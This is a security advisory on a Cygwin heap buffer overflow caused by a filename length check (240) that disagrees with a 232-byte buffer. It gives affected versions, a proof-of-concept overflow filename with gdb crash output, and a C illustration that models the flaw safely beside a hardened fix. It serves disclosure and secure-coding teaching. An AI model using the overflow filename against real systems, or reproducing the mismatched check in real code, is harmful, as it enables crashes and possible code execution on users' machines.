Cygwin is "a Linux-like environment for Windows which consists in a dll binary (cygwin1.dll) which emulates Linux api, and a set of tools which provide Linux look and feel". A vulnerability in Cygwin's filename length checking mechanism allows local attackers to overflow an internal heap buffer and cause the execution of arbitrary code.
Vulnerable Systems:
* cygwin1.dll version up to 1.5.7.
Immune Systems:
* cygwin1.dll version 1.5.24
Traditionally, Linux filesystems allow filenames up to 255 bytes long; Cygwin, however, allows only 239 bytes and has a check that rejects filenames of 240 bytes or more.
In spite of the check, the filename is stored in a 232-byte dynamically allocated buffer, so a filename between 233 and 239 bytes long passes the check and overflows the heap by at most 7 bytes.
The attacker therefore has to already be on the machine and place the evil file there; the exploit then controls 7 bytes of the private heap together with the ebx and edi registers.
The following filename has to be placed on the system; if we use touch to create it, cygwin is overflowed:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYY
$ gdb /usr/bin/touch.exe
GNU gdb 2003-09-20-cvs (cygwin-special)
...
(gdb) r AAAA ...
Program received signal SIGSEGV, Segmentation fault.
0x61091eea in getppid () from /usr/bin/cygwin1.dll
(gdb) x/i 0x61091eea
0x61091eea <getppid+2954>: mov 0xc(%ebp),%eax
(gdb) i r ebp eax
ebp 0x22006b 0x22006b
eax 0xffffffff -1
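The root cause above is a length check whose limit (240) disagrees with the size of the buffer it is supposed to protect (232). The following C program is an added illustration written for this page, not Cygwin's code: it models the mismatched check as a dry run that reports how many bytes would spill instead of writing them, places a hardened version beside it in which the guard is derived from the destination's real size, and builds a name of the same shape as the advisory's (142 'A's followed by four of each letter 'B' through 'Y', which by my count of the string above is 238 bytes). The constants, function names and the dry-run model are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constants as stated in the advisory: the check rejects names of 240 bytes
 * or more, but the heap buffer that receives the name holds only 232. */
#define NAME_LIMIT 240
#define NAME_BUF   232

/* Model of the vulnerable pattern (assumed, simplified): the admission check
 * uses NAME_LIMIT while the destination was sized with NAME_BUF. This dry run
 * never writes past the buffer; it returns how many bytes WOULD have spilled
 * (0 means the name fits, -1 means the length check rejected it). */
int vulnerable_store_dryrun(const char *name)
{
    size_t len = strlen(name);
    if (len >= NAME_LIMIT)              /* the only guard that existed */
        return -1;
    char *buf = malloc(NAME_BUF);
    if (buf == NULL)
        return -1;
    size_t n = len < NAME_BUF ? len : NAME_BUF;
    memcpy(buf, name, n);               /* real code copied all `len` bytes */
    free(buf);
    return (int)(len > NAME_BUF ? len - NAME_BUF : 0);
}

/* Hardened form: the guard is computed from the destination's actual size,
 * including room for the terminator, so check and buffer cannot drift apart.
 * Returns the stored length, or -1 when the name does not fit. */
int hardened_store(char *dst, size_t dstsz, const char *name)
{
    size_t len = strlen(name);
    if (len + 1 > dstsz)
        return -1;
    memcpy(dst, name, len + 1);
    return (int)len;
}

/* Builds a name shaped like the advisory's: 142 'A's, then 'B'..'Y' four
 * times each (24 letters * 4 = 96), giving 238 bytes. Returns the length,
 * or 0 if `out` is too small. */
size_t build_advisory_name(char *out, size_t outsz)
{
    const size_t total = 142 + 24 * 4;
    if (outsz < total + 1)
        return 0;
    memset(out, 'A', 142);
    size_t pos = 142;
    for (char c = 'B'; c <= 'Y'; c++)
        for (int i = 0; i < 4; i++)
            out[pos++] = c;
    out[pos] = '\0';
    return pos;
}

int main(void)
{
    char name[256];
    char dst[NAME_BUF];
    size_t len = build_advisory_name(name, sizeof name);

    printf("name length      : %zu\n", len);
    printf("vulnerable model : %d byte(s) would spill\n",
           vulnerable_store_dryrun(name));
    printf("hardened store   : %d (-1 = rejected)\n",
           hardened_store(dst, sizeof dst, name));
    return 0;
}
```

The point the program makes is the one to carry into code review: a limit written as a separate constant is only as safe as the discipline that keeps it in step with every allocation it guards, whereas a bound taken from the destination itself cannot be bypassed by a name that is "short enough" for the check but too long for the buffer.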